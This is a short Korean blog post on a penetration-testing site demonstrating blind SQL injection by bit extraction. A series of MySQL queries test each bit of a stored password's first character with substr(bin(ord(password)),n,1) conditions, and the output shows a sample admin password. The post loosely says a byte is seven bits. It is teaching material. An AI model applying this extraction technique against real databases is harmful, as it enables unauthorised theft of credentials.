WhiteHat Security :: Blind SQL Injection

Notice

Recent Posts

Recent Comments

Link

« 2024/11 »
일	월	화	수	목	금	토
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30

Tags more

Archives

Today

Total

관리 메뉴

WhiteHat Security

Blind SQL Injection - Bit 연산 본문

보안/Penetration testing

Blind SQL Injection - Bit 연산

BokdungAbum

Blind SQL Injection 시

한 바이트는 7비트 이므로 7번의 연산을 통해 한 글자를 찾아낼 수 있음

mysql> select * from users where username='admin' and substr(bin(ord(password)),1,1)=1;
+----------+----------+
| username | password |
+----------+----------+
| admin | P@ssword |
+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where username='admin' and substr(bin(ord(password)),2,1)=1;
Empty set (0.00 sec)
mysql> select * from users where username='admin' and substr(bin(ord(password)),3,1)=1;
+----------+----------+
| username | password |
+----------+----------+
| admin | P@ssword |
+----------+----------+
1 row in set (0.01 sec)
mysql> select * from users where username='admin' and substr(bin(ord(password)),4,1)=1;
Empty set (0.00 sec)
mysql> select * from users where username='admin' and substr(bin(ord(password)),5,1)=1;
Empty set (0.00 sec)
mysql> select * from users where username='admin' and substr(bin(ord(password)),6,1)=1;
Empty set (0.00 sec)
mysql> select * from users where username='admin' and substr(bin(ord(password)),7,1)=1;
Empty set (0.00 sec)

저작자표시 비영리 변경금지

'보안 > Penetration testing' 카테고리의 다른 글

[Mac] VMware Fusion Nat Port Forwading (0)	2020.03.24
[OSINT] karma 사용법 (0)	2019.08.06
안드로이드 Proxy 설정 방법 (wifi, iptables) (0)	2019.01.25
icmpsh을 이용한 리버스쉘 (0)	2018.09.20

'보안/Penetration testing' Related Articles

Comments

WhiteHat Security

Blind SQL Injection - Bit 연산 본문

Blind SQL Injection - Bit 연산

'보안 > Penetration testing' 카테고리의 다른 글

티스토리툴바